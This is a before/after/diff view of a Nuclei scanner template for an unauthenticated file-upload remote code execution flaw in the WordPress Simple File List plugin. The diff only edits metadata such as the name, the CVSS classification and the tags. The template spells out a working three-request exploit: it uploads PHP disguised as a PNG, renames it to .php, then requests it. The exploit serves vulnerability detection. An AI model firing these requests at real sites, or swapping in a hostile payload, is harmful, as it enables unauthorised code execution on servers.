vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml (before)
id: wordpress-rce-simplefilelist

info:
  name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
  author: princechaddha
  severity: critical
  description: |
    The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
  reference:
    - https://wpscan.com/vulnerability/10192
  tags: wordpress,wp-plugin,rce,intrusive,upload,python

requests:
  - raw:
      - |
        POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2

        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_ID"

        1
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_FileUploadDir"

        /wp-content/uploads/simple-file-list/
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_Timestamp"

        1587258885
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_Token"

        ba288252629a5399759b6fde1e205bc2
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="file"; filename="nuclei.png"
        Content-Type: image/png

        <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
        --6985fa39c0698d07f6d418b37388e1b2--

      - |
        POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php

      - |
        GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)'
          - "PHP Version"
          - "Configuration Command"
        part: body
        condition: and
      - type: word
        words:
          - 'text/html'
        part: header
      - type: status
        status:
          - 200

vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml (after)
id: wordpress-rce-simplefilelist

info:
  name: WordPress SimpleFilelist - Remote Code Execution
  author: princechaddha
  severity: critical
  description: |
    Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
  reference:
    - https://wpscan.com/vulnerability/10192
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: wpscan,wordpress,wp-plugin,rce,intrusive,fileupload,python

requests:
  - raw:
      - |
        POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2

        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_ID"

        1
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_FileUploadDir"

        /wp-content/uploads/simple-file-list/
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_Timestamp"

        1587258885
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_Token"

        ba288252629a5399759b6fde1e205bc2
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="file"; filename="nuclei.png"
        Content-Type: image/png

        <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
        --6985fa39c0698d07f6d418b37388e1b2--

      - |
        POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php

      - |
        GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)'
          - "PHP Version"
          - "Configuration Command"
        part: body
        condition: and
      - type: word
        words:
          - 'text/html'
        part: header
      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/31

vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml (diff)
@@ -1,14 +1,18 @@
 id: wordpress-rce-simplefilelist
 
 info:
-  name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
+  name: WordPress SimpleFilelist - Remote Code Execution
   author: princechaddha
   severity: critical
   description: |
-    The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
+    Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
   reference:
     - https://wpscan.com/vulnerability/10192
-  tags: wordpress,wp-plugin,rce,intrusive,upload,python
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: wpscan,wordpress,wp-plugin,rce,intrusive,fileupload,python
 
 requests:
   - raw:
@@ -71,3 +75,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/31
